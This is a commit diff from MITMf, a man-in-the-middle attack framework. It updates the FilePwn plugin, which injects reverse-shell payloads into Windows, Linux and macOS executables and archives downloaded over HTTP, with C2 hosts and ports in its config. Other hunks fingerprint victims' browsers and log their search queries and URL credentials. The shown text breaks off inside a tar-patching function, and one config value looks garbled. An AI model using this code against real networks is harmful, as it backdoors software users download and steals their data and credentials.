mirror of
https://github.com/byt3bl33d3r/MITMf.git
synced 2025-07-11 07:37:11 -07:00
- Updated FilePwn plugin with BDFactory v0.2 + license
- Added partial OS and Browser detection through clients user-agents - Improved jskeylogger plugin (now detects input field names) - Fixed bug where jskeylogger sent invalid charCodes on Android devices - Cleaned search engine query parsing code in ServerConnection.py - Updated setup.sh with new libs
This commit is contained in:
parent
a4e8869fc6
commit
4ae50e6e0c
8 changed files with 503 additions and 143 deletions
|
@ -1,3 +1,41 @@
|
||||||
|
"""
|
||||||
|
BackdoorFactory Proxy (BDFProxy) v0.2 - 'Something Something'
|
||||||
|
|
||||||
|
Author Joshua Pitts the.midnite.runr 'at' gmail <d ot > com
|
||||||
|
|
||||||
|
Copyright (c) 2013-2014, Joshua Pitts
|
||||||
|
All rights reserved.
|
||||||
|
|
||||||
|
Redistribution and use in source and binary forms, with or without modification,
|
||||||
|
are permitted provided that the following conditions are met:
|
||||||
|
|
||||||
|
1. Redistributions of source code must retain the above copyright notice,
|
||||||
|
this list of conditions and the following disclaimer.
|
||||||
|
|
||||||
|
2. Redistributions in binary form must reproduce the above copyright notice,
|
||||||
|
this list of conditions and the following disclaimer in the documentation
|
||||||
|
and/or other materials provided with the distribution.
|
||||||
|
|
||||||
|
3. Neither the name of the copyright holder nor the names of its contributors
|
||||||
|
may be used to endorse or promote products derived from this software without
|
||||||
|
specific prior written permission.
|
||||||
|
|
||||||
|
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
|
||||||
|
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
|
||||||
|
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
|
||||||
|
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
|
||||||
|
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
|
||||||
|
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
|
||||||
|
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
|
||||||
|
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
|
||||||
|
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
|
||||||
|
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
|
||||||
|
POSSIBILITY OF SUCH DAMAGE.
|
||||||
|
|
||||||
|
Tested on Kali-Linux.
|
||||||
|
|
||||||
|
"""
|
||||||
|
|
||||||
[ZIP]
|
[ZIP]
|
||||||
# patchCount is the max number of files to patch in a zip file
|
# patchCount is the max number of files to patch in a zip file
|
||||||
# After the max is reached it will bypass the rest of the files
|
# After the max is reached it will bypass the rest of the files
|
||||||
|
@ -10,6 +48,18 @@ maxSize = 40000000
|
||||||
|
|
||||||
blacklist = .dll, #don't do dlls in a zip file
|
blacklist = .dll, #don't do dlls in a zip file
|
||||||
|
|
||||||
|
[TAR]
|
||||||
|
# patchCount is the max number of files to patch in a tar file
|
||||||
|
# After the max is reached it will bypass the rest of the files
|
||||||
|
# and send on it's way
|
||||||
|
|
||||||
|
patchCount = 5
|
||||||
|
|
||||||
|
# In Bytes
|
||||||
|
maxSize = 40000000
|
||||||
|
|
||||||
|
blacklist = , # a comma is null do not leave blank
|
||||||
|
|
||||||
[targets]
|
[targets]
|
||||||
#MAKE SURE that your settings for host and port DO NOT
|
#MAKE SURE that your settings for host and port DO NOT
|
||||||
# overlap between different types of payloads
|
# overlap between different types of payloads
|
||||||
|
@ -18,9 +68,11 @@ blacklist = .dll, #don't do dlls in a zip file
|
||||||
|
|
||||||
LinuxType = ALL # choices: x86/x64/ALL/None
|
LinuxType = ALL # choices: x86/x64/ALL/None
|
||||||
WindowsType = ALL # choices: x86/x64/ALL/None
|
WindowsType = ALL # choices: x86/x64/ALL/None
|
||||||
|
FatPriority = x64 # choices: x86 or x64
|
||||||
|
|
||||||
FileSizeMax = 50000000 # ~50 MB (just under) No patching of files this large
|
FileSizeMax = 60000000 # ~60 MB (just under) No patching of files this large
|
||||||
|
|
||||||
|
CompressedFiles = True #True/False
|
||||||
[[[LinuxIntelx86]]]
|
[[[LinuxIntelx86]]]
|
||||||
SHELL = reverse_shell_tcp # This is the BDF syntax
|
SHELL = reverse_shell_tcp # This is the BDF syntax
|
||||||
HOST = 192.168.1.168 # The C2
|
HOST = 192.168.1.168 # The C2
|
||||||
|
@ -30,16 +82,16 @@ blacklist = .dll, #don't do dlls in a zip file
|
||||||
|
|
||||||
[[[LinuxIntelx64]]]
|
[[[LinuxIntelx64]]]
|
||||||
SHELL = reverse_shell_tcp
|
SHELL = reverse_shell_tcp
|
||||||
HOST = 192.168.10.4
|
HOST = 192.168.1.16
|
||||||
PORT = 6666
|
PORT = 9999
|
||||||
SUPPLIED_SHELLCODE = None
|
SUPPLIED_SHELLCODE = None
|
||||||
MSFPAYLOAD = linux/x64/shell_reverse_tcp
|
MSFPAYLOAD = linux/x64/shell_reverse_tcp
|
||||||
|
|
||||||
[[[WindowsIntelx86]]]
|
[[[WindowsIntelx86]]]
|
||||||
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
|
PATCH_TYPE = SINGLE #JUMP/SINGLE/APPEND
|
||||||
HOST = 192.168.10.4
|
HOST = 192.168.1.16
|
||||||
PORT = 6666
|
PORT = 8443
|
||||||
SHELL = iat_reverse_tcp
|
SHELL = reverse_shell_tcp
|
||||||
SUPPLIED_SHELLCODE = None
|
SUPPLIED_SHELLCODE = None
|
||||||
ZERO_CERT = False
|
ZERO_CERT = False
|
||||||
PATCH_DLL = True
|
PATCH_DLL = True
|
||||||
|
@ -50,7 +102,21 @@ blacklist = .dll, #don't do dlls in a zip file
|
||||||
HOST = 192.168.1.16
|
HOST = 192.168.1.16
|
||||||
PORT = 8088
|
PORT = 8088
|
||||||
SHELL = reverse_shell_tcp
|
SHELL = reverse_shell_tcp
|
||||||
SUPPLIED_SHELLCODE = None
|
SUPPLIED_SHELLCODE = Nonepatchpatchpatch
|
||||||
ZERO_CERT = True
|
ZERO_CERT = True
|
||||||
PATCH_DLL = False
|
PATCH_DLL = False
|
||||||
MSFPAYLOAD = windows/x64/shell_reverse_tcp
|
MSFPAYLOAD = windows/x64/shell_reverse_tcp
|
||||||
|
|
||||||
|
[[[MachoIntelx86]]]
|
||||||
|
SHELL = reverse_shell_tcp
|
||||||
|
HOST = 192.168.1.16
|
||||||
|
PORT = 4444
|
||||||
|
SUPPLIED_SHELLCODE = None
|
||||||
|
MSFPAYLOAD = linux/x64/shell_reverse_tcp
|
||||||
|
|
||||||
|
[[[MachoIntelx64]]]
|
||||||
|
SHELL = reverse_shell_tcp
|
||||||
|
HOST = 192.168.1.16
|
||||||
|
PORT = 5555
|
||||||
|
SUPPLIED_SHELLCODE = None
|
||||||
|
MSFPAYLOAD = linux/x64/shell_reverse_tcp
|
|
@ -1 +1 @@
|
||||||
Subproject commit 89d87b2fa1a499998a2109a751d8869e52485e0c
|
Subproject commit 303d059c4c2a1ecc19824bd755129152b6ad7fc1
|
|
@ -19,6 +19,7 @@
|
||||||
import logging, re, string, random, zlib, gzip, StringIO, sys
|
import logging, re, string, random, zlib, gzip, StringIO, sys
|
||||||
import plugins
|
import plugins
|
||||||
|
|
||||||
|
from user_agents import parse
|
||||||
from twisted.web.http import HTTPClient
|
from twisted.web.http import HTTPClient
|
||||||
from URLMonitor import URLMonitor
|
from URLMonitor import URLMonitor
|
||||||
from libs.sergioproxy.ProxyPlugins import ProxyPlugins
|
from libs.sergioproxy.ProxyPlugins import ProxyPlugins
|
||||||
|
@ -46,6 +47,7 @@ class ServerConnection(HTTPClient):
|
||||||
self.postData = postData
|
self.postData = postData
|
||||||
self.headers = headers
|
self.headers = headers
|
||||||
self.client = client
|
self.client = client
|
||||||
|
self.clientInfo = None
|
||||||
self.urlMonitor = URLMonitor.getInstance()
|
self.urlMonitor = URLMonitor.getInstance()
|
||||||
self.hsts = URLMonitor.getInstance().isHstsBypass()
|
self.hsts = URLMonitor.getInstance().isHstsBypass()
|
||||||
self.plugins = ProxyPlugins.getInstance()
|
self.plugins = ProxyPlugins.getInstance()
|
||||||
|
@ -73,50 +75,25 @@ class ServerConnection(HTTPClient):
|
||||||
|
|
||||||
def sendRequest(self):
|
def sendRequest(self):
|
||||||
if self.command == 'GET':
|
if self.command == 'GET':
|
||||||
message = "%s Sending Request: %s" % (self.client.getClientIP(), self.headers['host'])
|
user_agent = parse(self.headers['user-agent'])
|
||||||
if self.urlMonitor.isClientLogging() is True:
|
self.clientInfo = "%s [type:%s-%s os:%s] " % (self.client.getClientIP(), user_agent.browser.family, user_agent.browser.version[0], user_agent.os.family)
|
||||||
self.urlMonitor.writeClientLog(self.client, self.headers, message)
|
|
||||||
else:
|
logging.info(self.clientInfo + "Sending Request: %s" % self.headers['host'])
|
||||||
logging.info(message)
|
|
||||||
|
|
||||||
#Capture google searches
|
#Capture google searches
|
||||||
if ('google' in self.headers['host']):
|
if ('google' in self.headers['host']):
|
||||||
if ('search' in self.uri): #and ('search' in self.uri):
|
if ('search' in self.uri):
|
||||||
try:
|
self.captureQueries('q')
|
||||||
for param in self.uri.split('&'):
|
|
||||||
if param.split('=')[0] == 'q':
|
|
||||||
query = str(param.split('=')[1])
|
|
||||||
if query:
|
|
||||||
logging.info("%s is querying %s for: '%s'" % (self.client.getClientIP(), self.headers['host'], query))
|
|
||||||
except Exception, e:
|
|
||||||
error = str(e)
|
|
||||||
logging.warning("%s Error parsing google search query %s" % (self.client.getClientIP(), error))
|
|
||||||
|
|
||||||
#Capture bing searches
|
#Capture bing searches
|
||||||
if ('bing' in self.headers['host']):
|
if ('bing' in self.headers['host']):
|
||||||
if ('Suggestions' in self.uri):
|
if ('Suggestions' in self.uri):
|
||||||
try:
|
self.captureQueries('qry')
|
||||||
for param in self.uri.split('&'):
|
|
||||||
if param.split('=')[0] == 'qry':
|
|
||||||
query = str(param.split('=')[1])
|
|
||||||
if query:
|
|
||||||
logging.info("%s is querying %s for: '%s'" % (self.client.getClientIP(), self.headers['host'], query))
|
|
||||||
except Exception, e:
|
|
||||||
error = str(e)
|
|
||||||
logging.warning("%s Error parsing bing search query %s" % (self.client.getClientIP(), error))
|
|
||||||
|
|
||||||
#Capture yahoo searches
|
#Capture yahoo searches
|
||||||
if ('search.yahoo' in self.headers['host']):
|
if ('search.yahoo' in self.headers['host']):
|
||||||
if ('nresults' in self.uri):
|
if ('nresults' in self.uri):
|
||||||
try:
|
self.captureQueries('command')
|
||||||
for param in self.uri.split('&'):
|
|
||||||
if param.split('=')[0] == 'command':
|
|
||||||
query = str(param.split('=')[1])
|
|
||||||
if query:
|
|
||||||
logging.info("%s is querying %s for: '%s'" % (self.client.getClientIP(), self.headers['host'], query))
|
|
||||||
except Exception, e:
|
|
||||||
error = str(e)
|
|
||||||
logging.warning("%s Error parsing yahoo search query %s" % (self.client.getClientIP(), error))
|
|
||||||
|
|
||||||
#check for creds passed in GET requests.. It's surprising to see how many people still do this (please stahp)
|
#check for creds passed in GET requests.. It's surprising to see how many people still do this (please stahp)
|
||||||
for user in self.http_userfields:
|
for user in self.http_userfields:
|
||||||
|
@ -126,12 +103,22 @@ class ServerConnection(HTTPClient):
|
||||||
password = re.findall("(" + passw + ")=([^&|;]*)", self.uri, re.IGNORECASE)
|
password = re.findall("(" + passw + ")=([^&|;]*)", self.uri, re.IGNORECASE)
|
||||||
|
|
||||||
if (username and password):
|
if (username and password):
|
||||||
message = "%s %s Possible Credentials (%s):\n%s" % (self.client.getClientIP(), self.command, self.headers['host'], self.uri)
|
logging.warning(self.clientInfo + "%s Possible Credentials (%s):\n%s" % (self.command, self.headers['host'], self.uri))
|
||||||
logging.warning(message)
|
|
||||||
|
|
||||||
self.plugins.hook()
|
self.plugins.hook()
|
||||||
self.sendCommand(self.command, self.uri)
|
self.sendCommand(self.command, self.uri)
|
||||||
|
|
||||||
|
def captureQueries(self, search_param):
|
||||||
|
try:
|
||||||
|
for param in self.uri.split('&'):
|
||||||
|
if param.split('=')[0] == search_param:
|
||||||
|
query = str(param.split('=')[1])
|
||||||
|
if query:
|
||||||
|
logging.info(self.clientInfo + "is querying %s for: %s" % (self.headers['host'], query))
|
||||||
|
except Exception, e:
|
||||||
|
error = str(e)
|
||||||
|
logging.warning(self.clientInfo + "Error parsing google search query %s" % error)
|
||||||
|
|
||||||
def sendHeaders(self):
|
def sendHeaders(self):
|
||||||
for header, value in self.headers.items():
|
for header, value in self.headers.items():
|
||||||
logging.debug("Sending header: (%s => %s)" % (header, value))
|
logging.debug("Sending header: (%s => %s)" % (header, value))
|
||||||
|
@ -145,11 +132,7 @@ class ServerConnection(HTTPClient):
|
||||||
elif 'keylog' in self.uri:
|
elif 'keylog' in self.uri:
|
||||||
self.plugins.hook()
|
self.plugins.hook()
|
||||||
else:
|
else:
|
||||||
message = "%s %s Data (%s):\n%s" % (self.client.getClientIP(),self.getPostPrefix(),self.headers['host'],self.postData)
|
logging.warning("%s %s Data (%s):\n%s" % (self.client.getClientIP(), self.getPostPrefix(), self.headers['host'], self.postData))
|
||||||
if self.urlMonitor.isClientLogging() is True:
|
|
||||||
self.urlMonitor.writeClientLog(self.client, self.headers, message)
|
|
||||||
else:
|
|
||||||
logging.warning(message)
|
|
||||||
self.transport.write(self.postData)
|
self.transport.write(self.postData)
|
||||||
|
|
||||||
def connectionMade(self):
|
def connectionMade(self):
|
||||||
|
|
10
mitmf.py
10
mitmf.py
|
@ -9,6 +9,16 @@ from libs.sergioproxy.ProxyPlugins import ProxyPlugins
|
||||||
import sys, logging, traceback, string, os
|
import sys, logging, traceback, string, os
|
||||||
import argparse
|
import argparse
|
||||||
|
|
||||||
|
try:
|
||||||
|
import user_agents
|
||||||
|
except:
|
||||||
|
sys.exit("[-] user_agents library not installed!")
|
||||||
|
|
||||||
|
try:
|
||||||
|
import configobj
|
||||||
|
except:
|
||||||
|
sys.exit("[-] configobj library not installed!")
|
||||||
|
|
||||||
from plugins import *
|
from plugins import *
|
||||||
plugin_classes = plugin.Plugin.__subclasses__()
|
plugin_classes = plugin.Plugin.__subclasses__()
|
||||||
|
|
||||||
|
|
|
@ -2,6 +2,44 @@
|
||||||
# 99.9999999% of this code is stolen from BDFProxy - https://github.com/secretsquirrel/BDFProxy
|
# 99.9999999% of this code is stolen from BDFProxy - https://github.com/secretsquirrel/BDFProxy
|
||||||
#################################################################################################
|
#################################################################################################
|
||||||
|
|
||||||
|
"""
|
||||||
|
BackdoorFactory Proxy (BDFProxy) v0.2 - 'Something Something'
|
||||||
|
|
||||||
|
Author Joshua Pitts the.midnite.runr 'at' gmail <d ot > com
|
||||||
|
|
||||||
|
Copyright (c) 2013-2014, Joshua Pitts
|
||||||
|
All rights reserved.
|
||||||
|
|
||||||
|
Redistribution and use in source and binary forms, with or without modification,
|
||||||
|
are permitted provided that the following conditions are met:
|
||||||
|
|
||||||
|
1. Redistributions of source code must retain the above copyright notice,
|
||||||
|
this list of conditions and the following disclaimer.
|
||||||
|
|
||||||
|
2. Redistributions in binary form must reproduce the above copyright notice,
|
||||||
|
this list of conditions and the following disclaimer in the documentation
|
||||||
|
and/or other materials provided with the distribution.
|
||||||
|
|
||||||
|
3. Neither the name of the copyright holder nor the names of its contributors
|
||||||
|
may be used to endorse or promote products derived from this software without
|
||||||
|
specific prior written permission.
|
||||||
|
|
||||||
|
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
|
||||||
|
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
|
||||||
|
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
|
||||||
|
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
|
||||||
|
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
|
||||||
|
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
|
||||||
|
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
|
||||||
|
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
|
||||||
|
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
|
||||||
|
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
|
||||||
|
POSSIBILITY OF SUCH DAMAGE.
|
||||||
|
|
||||||
|
Tested on Kali-Linux.
|
||||||
|
|
||||||
|
"""
|
||||||
|
|
||||||
import sys
|
import sys
|
||||||
import os
|
import os
|
||||||
import pefile
|
import pefile
|
||||||
|
@ -10,12 +48,14 @@ import logging
|
||||||
import shutil
|
import shutil
|
||||||
import random
|
import random
|
||||||
import string
|
import string
|
||||||
from libs.bdfactory import pebin, elfbin
|
import tarfile
|
||||||
|
from libs.bdfactory import pebin
|
||||||
|
from libs.bdfactory import elfbin
|
||||||
|
from libs.bdfactory import machobin
|
||||||
from plugins.plugin import Plugin
|
from plugins.plugin import Plugin
|
||||||
from tempfile import mkstemp
|
from tempfile import mkstemp
|
||||||
from configobj import ConfigObj
|
from configobj import ConfigObj
|
||||||
|
|
||||||
|
|
||||||
class FilePwn(Plugin):
|
class FilePwn(Plugin):
|
||||||
name = "FilePwn"
|
name = "FilePwn"
|
||||||
optname = "filepwn"
|
optname = "filepwn"
|
||||||
|
@ -23,6 +63,47 @@ class FilePwn(Plugin):
|
||||||
has_opts = False
|
has_opts = False
|
||||||
desc = "Backdoor executables being sent over http using bdfactory"
|
desc = "Backdoor executables being sent over http using bdfactory"
|
||||||
|
|
||||||
|
def initialize(self, options):
|
||||||
|
'''Called if plugin is enabled, passed the options namespace'''
|
||||||
|
self.options = options
|
||||||
|
|
||||||
|
#FOR FUTURE USE
|
||||||
|
self.binaryMimeTypes = ["application/octet-stream", 'application/x-msdownload', 'application/x-msdos-program', 'binary/octet-stream']
|
||||||
|
|
||||||
|
#FOR FUTURE USE
|
||||||
|
self.zipMimeTypes = ['application/x-zip-compressed', 'application/zip']
|
||||||
|
|
||||||
|
#USED NOW
|
||||||
|
self.magicNumbers = {'elf': {'number': '7f454c46'.decode('hex'), 'offset': 0},
|
||||||
|
'pe': {'number': 'MZ', 'offset': 0},
|
||||||
|
'gz': {'number': '1f8b'.decode('hex'), 'offset': 0},
|
||||||
|
'bz': {'number': 'BZ', 'offset': 0},
|
||||||
|
'zip': {'number': '504b0304'.decode('hex'), 'offset': 0},
|
||||||
|
'tar': {'number': 'ustar', 'offset': 257},
|
||||||
|
'fatfile': {'number': 'cafebabe'.decode('hex'), 'offset': 0},
|
||||||
|
'machox64': {'number': 'cffaedfe'.decode('hex'), 'offset': 0},
|
||||||
|
'machox86': {'number': 'cefaedfe'.decode('hex'), 'offset': 0},
|
||||||
|
}
|
||||||
|
|
||||||
|
#NOT USED NOW
|
||||||
|
#self.supportedBins = ('MZ', '7f454c46'.decode('hex'))
|
||||||
|
|
||||||
|
self.userConfig = ConfigObj("./config/filepwn.cfg")
|
||||||
|
self.FileSizeMax = self.userConfig['targets']['ALL']['FileSizeMax']
|
||||||
|
self.WindowsIntelx86 = self.userConfig['targets']['ALL']['WindowsIntelx86']
|
||||||
|
self.WindowsIntelx64 = self.userConfig['targets']['ALL']['WindowsIntelx64']
|
||||||
|
self.WindowsType = self.userConfig['targets']['ALL']['WindowsType']
|
||||||
|
self.LinuxIntelx86 = self.userConfig['targets']['ALL']['LinuxIntelx86']
|
||||||
|
self.LinuxIntelx64 = self.userConfig['targets']['ALL']['LinuxIntelx64']
|
||||||
|
self.LinuxType = self.userConfig['targets']['ALL']['LinuxType']
|
||||||
|
self.MachoIntelx86 = self.userConfig['targets']['ALL']['MachoIntelx86']
|
||||||
|
self.MachoIntelx64 = self.userConfig['targets']['ALL']['MachoIntelx64']
|
||||||
|
self.FatPriority = self.userConfig['targets']['ALL']['FatPriority']
|
||||||
|
self.zipblacklist = self.userConfig['ZIP']['blacklist']
|
||||||
|
self.tarblacklist = self.userConfig['TAR']['blacklist']
|
||||||
|
|
||||||
|
print "[*] FilePwn plugin online"
|
||||||
|
|
||||||
def convert_to_Bool(self, aString):
|
def convert_to_Bool(self, aString):
|
||||||
if aString.lower() == 'true':
|
if aString.lower() == 'true':
|
||||||
return True
|
return True
|
||||||
|
@ -31,29 +112,11 @@ class FilePwn(Plugin):
|
||||||
elif aString.lower() == 'none':
|
elif aString.lower() == 'none':
|
||||||
return None
|
return None
|
||||||
|
|
||||||
def initialize(self, options):
|
def bytes_have_format(self, bytess, formatt):
|
||||||
'''Called if plugin is enabled, passed the options namespace'''
|
number = self.magicNumbers[formatt]
|
||||||
self.options = options
|
if bytess[number['offset']:number['offset'] + len(number['number'])] == number['number']:
|
||||||
|
return True
|
||||||
self.binaryMimeTypes = ["application/octet-stream", 'application/x-msdownload',
|
return False
|
||||||
'application/x-msdos-program', 'binary/octet-stream']
|
|
||||||
|
|
||||||
self.zipMimeTypes = ['application/x-zip-compressed', 'application/zip']
|
|
||||||
|
|
||||||
#NOT USED NOW
|
|
||||||
#self.supportedBins = ('MZ', '7f454c46'.decode('hex'))
|
|
||||||
|
|
||||||
self.userConfig = ConfigObj("./config/filepwn.cfg")
|
|
||||||
self.FileSizeMax = self.userConfig['targets']['ALL']['FileSizeMax']
|
|
||||||
self.WindowsIntelx86 = self.userConfig['targets']['ALL']['WindowsIntelx86']
|
|
||||||
self.WindowsIntelx64 = self.userConfig['targets']['ALL']['WindowsIntelx64']
|
|
||||||
self.WindowsType = self.userConfig['targets']['ALL']['WindowsType']
|
|
||||||
self.LinuxIntelx86 = self.userConfig['targets']['ALL']['LinuxIntelx86']
|
|
||||||
self.LinuxIntelx64 = self.userConfig['targets']['ALL']['LinuxIntelx64']
|
|
||||||
self.LinuxType = self.userConfig['targets']['ALL']['LinuxType']
|
|
||||||
self.zipblacklist = self.userConfig['ZIP']['blacklist']
|
|
||||||
|
|
||||||
print "[*] FilePwn plugin online"
|
|
||||||
|
|
||||||
def binaryGrinder(self, binaryFile):
|
def binaryGrinder(self, binaryFile):
|
||||||
"""
|
"""
|
||||||
|
@ -118,7 +181,7 @@ class FilePwn(Plugin):
|
||||||
CAVE_JUMPING=cave_jumping,
|
CAVE_JUMPING=cave_jumping,
|
||||||
IMAGE_TYPE=self.WindowsType,
|
IMAGE_TYPE=self.WindowsType,
|
||||||
PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx86['PATCH_DLL']),
|
PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx86['PATCH_DLL']),
|
||||||
SUPPLIED_SHELLCODE=self.convert_to_Bool(self.WindowsIntelx86['SUPPLIED_SHELLCODE']),
|
SUPPLIED_SHELLCODE=self.WindowsIntelx86['SUPPLIED_SHELLCODE'],
|
||||||
ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx86['ZERO_CERT'])
|
ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx86['ZERO_CERT'])
|
||||||
)
|
)
|
||||||
|
|
||||||
|
@ -126,17 +189,17 @@ class FilePwn(Plugin):
|
||||||
|
|
||||||
elif binaryHeader[:4].encode('hex') == '7f454c46': # ELF
|
elif binaryHeader[:4].encode('hex') == '7f454c46': # ELF
|
||||||
|
|
||||||
targetFile = elfbin.elfbin(FILE=binaryFile, SUPPORT_CHECK=True)
|
targetFile = elfbin.elfbin(FILE=binaryFile, SUPPORT_CHECK=False)
|
||||||
targetFile.support_check()
|
targetFile.support_check()
|
||||||
|
|
||||||
if targetFile.class_type == 0x1:
|
if targetFile.class_type == 0x1:
|
||||||
#x86
|
#x86CPU Type
|
||||||
targetFile = elfbin.elfbin(FILE=binaryFile,
|
targetFile = elfbin.elfbin(FILE=binaryFile,
|
||||||
OUTPUT=os.path.basename(binaryFile),
|
OUTPUT=os.path.basename(binaryFile),
|
||||||
SHELL=self.LinuxIntelx86['SHELL'],
|
SHELL=self.LinuxIntelx86['SHELL'],
|
||||||
HOST=self.LinuxIntelx86['HOST'],
|
HOST=self.LinuxIntelx86['HOST'],
|
||||||
PORT=int(self.LinuxIntelx86['PORT']),
|
PORT=int(self.LinuxIntelx86['PORT']),
|
||||||
SUPPLIED_SHELLCODE=self.convert_to_Bool(self.LinuxIntelx86['SUPPLIED_SHELLCODE']),
|
SUPPLIED_SHELLCODE=self.LinuxIntelx86['SUPPLIED_SHELLCODE'],
|
||||||
IMAGE_TYPE=self.LinuxType
|
IMAGE_TYPE=self.LinuxType
|
||||||
)
|
)
|
||||||
result = targetFile.run_this()
|
result = targetFile.run_this()
|
||||||
|
@ -147,24 +210,200 @@ class FilePwn(Plugin):
|
||||||
SHELL=self.LinuxIntelx64['SHELL'],
|
SHELL=self.LinuxIntelx64['SHELL'],
|
||||||
HOST=self.LinuxIntelx64['HOST'],
|
HOST=self.LinuxIntelx64['HOST'],
|
||||||
PORT=int(self.LinuxIntelx64['PORT']),
|
PORT=int(self.LinuxIntelx64['PORT']),
|
||||||
SUPPLIED_SHELLCODE=self.convert_to_Bool(self.LinuxIntelx64['SUPPLIED_SHELLCODE']),
|
SUPPLIED_SHELLCODE=self.LinuxIntelx64['SUPPLIED_SHELLCODE'],
|
||||||
IMAGE_TYPE=self.LinuxType
|
IMAGE_TYPE=self.LinuxType
|
||||||
)
|
)
|
||||||
result = targetFile.run_this()
|
result = targetFile.run_this()
|
||||||
|
|
||||||
|
elif binaryHeader[:4].encode('hex') in ['cefaedfe', 'cffaedfe', 'cafebabe']: # Macho
|
||||||
|
targetFile = machobin.machobin(FILE=binaryFile, SUPPORT_CHECK=False)
|
||||||
|
targetFile.support_check()
|
||||||
|
|
||||||
|
#ONE CHIP SET MUST HAVE PRIORITY in FAT FILE
|
||||||
|
|
||||||
|
if targetFile.FAT_FILE is True:
|
||||||
|
if self.FatPriority == 'x86':
|
||||||
|
targetFile = machobin.machobin(FILE=binaryFile,
|
||||||
|
OUTPUT = os.path.basename(binaryFile),
|
||||||
|
SHELL=self.MachoIntelx86['SHELL'],
|
||||||
|
HOST=self.MachoIntelx86['HOST'],
|
||||||
|
PORT=int(self.MachoIntelx86['PORT']),
|
||||||
|
SUPPLIED_SHELLCODE=self.MachoIntelx86['SUPPLIED_SHELLCODE'],
|
||||||
|
FAT_PRIORITY=self.FatPriority
|
||||||
|
)
|
||||||
|
result = targetFile.run_this()
|
||||||
|
|
||||||
|
elif self.FatPriority == 'x64':
|
||||||
|
targetFile = machobin.machobin(FILE=binaryFile,
|
||||||
|
OUTPUT = os.path.basename(binaryFile),
|
||||||
|
SHELL=self.MachoIntelx64['SHELL'],
|
||||||
|
HOST=self.MachoIntelx64['HOST'],
|
||||||
|
PORT=int(self.MachoIntelx64['PORT']),
|
||||||
|
SUPPLIED_SHELLCODE=self.MachoIntelx64['SUPPLIED_SHELLCODE'],
|
||||||
|
FAT_PRIORITY=self.FatPriority
|
||||||
|
)
|
||||||
|
result = targetFile.run_this()
|
||||||
|
|
||||||
|
elif targetFile.mach_hdrs[0]['CPU Type'] == '0x7':
|
||||||
|
targetFile = machobin.machobin(FILE=binaryFile,
|
||||||
|
OUTPUT = os.path.basename(binaryFile),
|
||||||
|
SHELL=self.MachoIntelx86['SHELL'],
|
||||||
|
HOST=self.MachoIntelx86['HOST'],
|
||||||
|
PORT=int(self.MachoIntelx86['PORT']),
|
||||||
|
SUPPLIED_SHELLCODE=self.MachoIntelx86['SUPPLIED_SHELLCODE'],
|
||||||
|
FAT_PRIORITY=self.FatPriority
|
||||||
|
)
|
||||||
|
result = targetFile.run_this()
|
||||||
|
|
||||||
|
elif targetFile.mach_hdrs[0]['CPU Type'] == '0x1000007':
|
||||||
|
targetFile = machobin.machobin(FILE=binaryFile,
|
||||||
|
OUTPUT = os.path.basename(binaryFile),
|
||||||
|
SHELL=self.MachoIntelx64['SHELL'],
|
||||||
|
HOST=self.MachoIntelx64['HOST'],
|
||||||
|
PORT=int(self.MachoIntelx64['PORT']),
|
||||||
|
SUPPLIED_SHELLCODE=self.MachoIntelx64['SUPPLIED_SHELLCODE'],
|
||||||
|
FAT_PRIORITY=self.FatPriority
|
||||||
|
)
|
||||||
|
result = targetFile.run_this()
|
||||||
|
|
||||||
return result
|
return result
|
||||||
|
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
|
print 'Exception', str(e)
|
||||||
logging.warning("EXCEPTION IN binaryGrinder %s", str(e))
|
logging.warning("EXCEPTION IN binaryGrinder %s", str(e))
|
||||||
return None
|
return None
|
||||||
|
|
||||||
def zipGrinder(self, aZipFile):
|
def tar_files(self, aTarFileBytes, formatt):
|
||||||
|
"When called will unpack and edit a Tar File and return a tar file"
|
||||||
|
|
||||||
|
print "[*] TarFile size:", len(aTarFileBytes) / 1024, 'KB'
|
||||||
|
|
||||||
|
if len(aTarFileBytes) > int(self.userConfig['TAR']['maxSize']):
|
||||||
|
print "[!] TarFile over allowed size"
|
||||||
|
logging.info("TarFIle maxSize met %s", len(aTarFileBytes))
|
||||||
|
return aTarFileBytes
|
||||||
|
|
||||||
|
with tempfile.NamedTemporaryFile() as tarFileStorage:
|
||||||
|
tarFileStorage.write(aTarFileBytes)
|
||||||
|
tarFileStorage.flush()
|
||||||
|
|
||||||
|
if not tarfile.is_tarfile(tarFileStorage.name):
|
||||||
|
